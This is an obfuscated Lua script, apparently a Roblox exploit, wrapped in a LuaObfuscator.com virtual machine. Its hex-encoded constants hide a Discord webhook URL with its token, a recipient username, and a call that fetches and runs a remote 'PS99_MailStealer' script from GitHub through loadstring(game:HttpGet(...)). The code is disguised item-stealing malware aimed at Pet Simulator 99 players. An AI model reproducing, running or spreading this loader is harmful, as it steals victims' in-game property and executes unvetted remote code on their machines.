--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v81,v19);v19=nil;v97=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=877 -(282 + 595) ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-((4 -2) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(1066 -(68 + 997)))) + (1271 -(226 + 1044)))) ;return v83-(v83%(620 -(555 + 64))) ;end end else local v84=931 -(857 + 74) ;local v85;while true do if (v84==(568 -(367 + 201))) then v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + (0 -0))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (11 -8) + 1 ;return (v40 * 16777216) + (v39 * (160901 -(96317 -(802 + 150)))) + (v38 * ((508 -319) + 67)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1 + 0 ,1017 -(915 + 82) ) * ((5 -3)^((457 -(145 + 293)) + (443 -(44 + 386))))) + v41 ;local v45=v20(v42,27 -6 ,1218 -(1069 + (1604 -(998 + 488))) );local v46=((v20(v42,32)==1) and  -(2 -1)) or (1 -(0 + 0)) ;if (v45==0) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else v45=1 + 0 ;v43=791 -(368 + 423) ;end elseif (v45==(6433 -4386)) then return ((v44==(18 -(10 + 8))) and (v46 * ((3 -2)/(442 -(416 + 26))))) or (v46 * NaN) ;end return v8(v46,v45-(3266 -2243) ) * (v43 + (v44/((1 + 1)^(91 -39)))) ;end local function v25(v47) local v48=0 + 0 ;local v49;local v50;while true do if (v48==0) then v49=nil;if  not v47 then v47=v23();if (v47==(859 -(814 + 45))) then return "";end end v48=773 -(201 + 571) ;end if (v48==(1141 -(116 + 1022))) then return v6(v50);end if (v48==2) then v50={};for v89=1 + 0 , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=12 -9 ;end if (v48==((2309 -(630 + 793)) -(261 + 624))) then v49=v3(v16,v18,(v18 + v47) -((3 -2) + 0) );v18=v18 + v47 ;v48=7 -5 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 867 -(550 + 317) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v65=(function() return 0;end)();while true do if (v65~=(0 -0)) then else if (v51~=1) then else v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v58=(function() return {};end)();for v99= #",",v57 do local v100=(function() return 0;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();while true do if (v100==(1 -0)) then v103=(function() return nil;end)();while true do if (v101~=1) then else if (v102== #"\\") then v103=(function() return v21()~=(0 -0) ;end)();elseif (v102==(287 -(134 + 151))) then v103=(function() return v24();end)();elseif (v102== #"19(") then v103=(function() return v25();end)();end v58[v99]=(function() return v103;end)();break;end if ((1665 -(970 + 695))~=v101) then else local v162=(function() return 0 -0 ;end)();local v163=(function() return;end)();while true do if (v162==0) then v163=(function() return 1990 -(582 + 1408) ;end)();while true do if (v163~=0) then else local v185=(function() return 0 -0 ;end)();while true do if ((1 -0)==v185) then v163=(function() return 3 -2 ;end)();break;end if (0==v185) then v102=(function() return v21();end)();v103=(function() return nil;end)();v185=(function() return 1825 -(1195 + 629) ;end)();end end end if (v163==1) then v101=(function() return 1 -0 ;end)();break;end end break;end end end end break;end if (v100~=0) then else v101=(function() return 0;end)();v102=(function() return nil;end)();v100=(function() return 1;end)();end end end v51=(function() return 243 -(187 + 54) ;end)();end if (v51==(782 -(162 + 618))) then v56[ #"19("]=(function() return v21();end)();for v104= #",",v23() do local v105=(function() return v21();end)();if (v20(v105, #">", #"/")==0) then local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107~=1) then else local v135=(function() return 0;end)();while true do if (v135==(1 + 0)) then v107=(function() return 2 + 0 ;end)();break;end if (v135==0) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 0;end)();while true do if (v182==0) then v110[ #"gha"]=(function() return v22();end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v108== #"|") then v110[ #"xxx"]=(function() return v23();end)();elseif (v108==(2 -0)) then v110[ #"91("]=(function() return v23() -((1 + 1)^(1652 -(1373 + 263))) ;end)();elseif (v108== #"-19") then local v190=(function() return 1000 -(451 + 549) ;end)();local v191=(function() return;end)();while true do if (v190==0) then v191=(function() return 0;end)();while true do if (v191==0) then v110[ #"91("]=(function() return v23() -(2^(6 + 10)) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v135=(function() return 1 -0 ;end)();end end end if (v107~=2) then else if (v20(v109, #" ", #"]")== #"}") then v110[2 -0 ]=(function() return v58[v110[1386 -(746 + 638) ]];end)();end if (v20(v109,2,2)== #"/") then v110[ #"91("]=(function() return v58[v110[ #"xnx"]];end)();end v107=(function() return 3;end)();end if ((0 + 0)~=v107) then else local v136=(function() return 0 -0 ;end)();local v137=(function() return;end)();while true do if ((341 -(218 + 123))==v136) then v137=(function() return 0;end)();while true do if (v137==(1581 -(1535 + 46))) then local v184=(function() return 0;end)();while true do if (v184==(0 + 0)) then v108=(function() return v20(v105,2, #"19(");end)();v109=(function() return v20(v105, #"?id=",1 + 5 );end)();v184=(function() return 561 -(306 + 254) ;end)();end if (v184==1) then v137=(function() return 1;end)();break;end end end if ((1 + 0)==v137) then v107=(function() return 1;end)();break;end end break;end end end if (v107==(5 -2)) then if (v20(v109, #"-19", #"xxx")== #"!") then v110[ #"http"]=(function() return v58[v110[ #"xnxx"]];end)();end v53[v104]=(function() return v110;end)();break;end end end end for v106= #":",v23() do v54,v106,v28=(function() return v52(v54,v106,v28);end)();end return v56;end v65=(function() return 1468 -(899 + 568) ;end)();end if (v65~=(1 + 0)) then else if (0==v51) then local v96=(function() return 0;end)();while true do if (v96==(2 -1)) then v54=(function() return {};end)();v55=(function() return {};end)();v96=(function() return 2;end)();end if (v96==(605 -(268 + 335))) then v51=(function() return 1;end)();break;end if (v96~=(290 -(60 + 230))) then else v52=(function() return function(v127,v128,v129) local v130=(function() return 572 -(426 + 146) ;end)();local v131=(function() return;end)();while true do if (v130==(0 + 0)) then v131=(function() return 1456 -(282 + 1174) ;end)();while true do if (v131~=0) then else v127[v128-#"}" ]=(function() return v129();end)();return v127,v128,v129;end end break;end end end;end)();v53=(function() return {};end)();v96=(function() return 812 -(569 + 242) ;end)();end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[(1 + 1) -1 ];local v63=v59[2];local v64=v59[3];return function(...) local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=1 + (0 -0) ;local v71= -(1025 -(706 + 318));local v72={};local v73={...};local v74=v12("#",...) -(1272 -(945 + 326)) ;local v75={};local v76={};for v86=0 -(1202 -(373 + 829)) ,v74 do if ((3242>=567) and (v86>=v68)) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 + 0 ];end end local v77=(v74-v68) + (701 -(271 + 429)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[732 -(476 + 255) ];if (v79<=(10 + 0)) then if ((v79<=(1504 -(1408 + 92))) or (847>=1263)) then if (v79<=(1087 -(461 + 625))) then if (v79==(1288 -(993 + 295))) then local v111=1130 -(369 + 761) ;local v112;local v113;while true do if (v111==((978 -(553 + 424)) + 0)) then v76[v112 + (1172 -(418 + 753)) ]=v113;v76[v112]=v113[v78[2 + 2 ]];break;end if (v111==(0 + 0)) then v112=v78[1 + 1 ];v113=v76[v78[1 + 2 ]];v111=530 -(406 + 123) ;end end else local v114=v78[2];local v115,v116=v69(v76[v114](v13(v76,v114 + (1770 -(1749 + (37 -17))) ,v78[3])));v71=(v116 + v114) -(1 + 0 + 0) ;local v117=1322 -(1249 + 73) ;for v132=v114,v71 do v117=v117 + 1 + 0 ;v76[v132]=v115[v117];end end elseif (v79<=(1147 -(466 + 679))) then local v118=v78[4 -2 ];local v119=v76[v78[(8 + 0) -5 ]];v76[v118 + (1901 -(106 + 1794)) ]=v119;v76[v118]=v119[v78[2 + 2 ]];elseif (v79==(5 -2)) then if (v76[v78[2]]==v78[2 + 2 ]) then v70=v70 + (2 -1) ;else v70=v78[(7 + 0) -4 ];end else v70=v78[117 -(4 + 110) ];end elseif (v79<=(591 -(57 + 527))) then if (v79<=5) then if ((v76[v78[2]]==v78[4]) or (2253==1851)) then v70=v70 + 1 ;else v70=v78[1430 -(41 + 1386) ];end elseif (v79==6) then v76[v78[105 -(17 + 86) ]]=v78[3 + 0 ];else v70=v78[6 -(5 -2) ];end elseif (v79<=8) then v61[v78[8 -5 ]]=v76[v78[(406 -(64 + 174)) -(122 + 44) ]];elseif ((v79>(15 -6)) or (2087>2372)) then local v144=0 -0 ;local v145;local v146;local v147;local v148;while true do if (v144==(0 + 0)) then v145=v78[2 + 0 ];v146,v147=v69(v76[v145](v13(v76,v145 + 1 + 0 + 0 ,v78[3])));v144=1 -0 ;end if ((v144==(66 -((44 -14) + (371 -(144 + 192))))) or (4445<4149)) then v71=(v147 + v145) -(1 + 0) ;v148=1257 -((1259 -(42 + 174)) + 214) ;v144=7 -5 ;end if (v144==(1214 -(138 + 185 + 889))) then for v178=v145,v71 do v148=v148 + 1 ;v76[v178]=v146[v148];end break;end end else v61[v78[3]]=v76[v78[2]];end elseif (v79<=(40 -25)) then if (v79<=(592 -(361 + 219))) then if ((v79==(331 -(31 + 22 + 267))) or (1818==85)) then v76[v78[1 + 1 ]]=v78[416 -(15 + 398) ]~=(982 -(18 + 964)) ;else v76[v78[7 -5 ]]();end elseif (v79<=(8 + 5)) then do return;end elseif (v79==(9 + (10 -5))) then do return;end else v76[v78[852 -(20 + 830) ]]=v61[v78[7 -4 ]];end elseif (v79<=(15 + 3)) then if ((630<2127) and (v79<=(142 -(116 + 10)))) then v76[v78[1 + 1 ]]();elseif ((v79>(37 -20)) or (1938==2514)) then local v153=0;local v154;while true do if ((4255>=55) and ((738 -(542 + 57 + 139))==v153)) then v154=v78[3 -1 ];v76[v154]=v76[v154](v13(v76,v154 + 1 + 0 + 0 ,v71));break;end end else local v155=(0 -0) + (753 -(239 + 514)) ;local v156;while true do if ((2999>1156) and (v155==(0 + 0 + 0))) then v156=v78[4 -2 ];v76[v156]=v76[v156](v13(v76,v156 + (2 -1) ,v71));break;end end end elseif (v79<=(1570 -(1126 + 150 + 275))) then v76[v78[407 -(118 + 122 + 165) ]]=v78[1332 -(797 + 532) ]~=((1504 -(363 + 1141)) -0) ;elseif ((2350>1155) and (v79==(1141 -(118 + 1003)))) then v76[v78[5 -3 ]]=v61[v78[(277 + 103) -(142 + 235) ]];else v76[v78[9 -7 ]]=v78[3];end v70=v70 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313334313035392Q33383135313931393739302F5950586B4C675769706965414C76345170355F5650444D6F576D727553523941356C564176356B64663858664E6C64616E71424D46536765674751366A57514257387431030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692Q75502F50532Q395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083Q00557365726E616D65030B3Q006D6174685F647530383539030A3Q004C6F61645363722Q656E00163Q0012153Q00013Q0026053Q000D000100020004073Q000D0001001215000100043Q001208000100033Q001214000100053Q001214000200063Q002002000200020007001215000400084Q000A000200044Q001200013Q00022Q00100001000100010004073Q001500010026053Q0001000100010004073Q000100010012150001000A3Q001208000100094Q0013000100013Q0012080001000B3Q0012153Q00023Q0004073Q000100012Q000D3Q00017Q00",v9(),...);
